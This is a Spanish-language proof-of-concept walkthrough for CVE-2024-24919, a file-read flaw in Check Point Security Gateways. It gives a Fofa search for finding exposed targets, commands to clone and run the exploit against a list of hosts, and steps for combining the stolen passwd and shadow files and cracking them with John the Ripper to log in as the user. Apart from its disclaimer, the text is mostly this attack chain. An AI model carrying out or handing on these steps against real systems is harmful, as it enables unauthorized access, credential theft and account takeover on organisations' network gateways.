
POC - CVE-2024–24919 - Check Point Security Gateways
Permitiendo potencialmente a un atacante leer cierta información en Check Point Security Gateways una vez conectados a Internet y habilitados con Remote Access VPN o Mobile Access Software Blades. Hay disponible un parche de seguridad que mitiga esta vulnerabilidad.
Lea sobre ello — CVE-2024-24919
Descargo de responsabilidad: Esta prueba de concepto (POC) se ha creado con fines educativos y de pruebas éticas únicamente. El uso de esta herramienta para atacar objetivos sin consentimiento mutuo previo es ilegal. Es responsabilidad del usuario final cumplir con todas las leyes locales, estatales y federales aplicables. Los desarrolladores no asumen ninguna responsabilidad y no son responsables por el mal uso o los daños causados por este programa.
Para encontrar posibles objetivos, use Fofa (similar a Shodan.io):
app=”Check_Point-SSL-Network-Extender”
Primero, clone el repositorio:
git clone https://github.com/verylazytech/CVE-2024-24919
Después, elija su objetivo y añádalo al archivo list.txt con este formato:
Ejecute el exploit:
python3 CVE-2024-24919.py -l list.txt
Ahora hay 2 opciones de salida:
Fallido:

Exitoso:

Ahora, después de encontrar los archivos passwd y shadow, puede intentar crackear el hash con JohnTheRipper. Tras ejecutar el exploit tendrá 2 archivos, passwd y shadow, por lo que puede fusionarlos en un solo archivo e intentar crackearlos (yo usé rockyou.txt, pero puede ser cualquier lista de contraseñas):
unshadow passwd shadow > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

¡Y ahora, una vez crackeado el hash, podemos iniciar sesión con el usuario!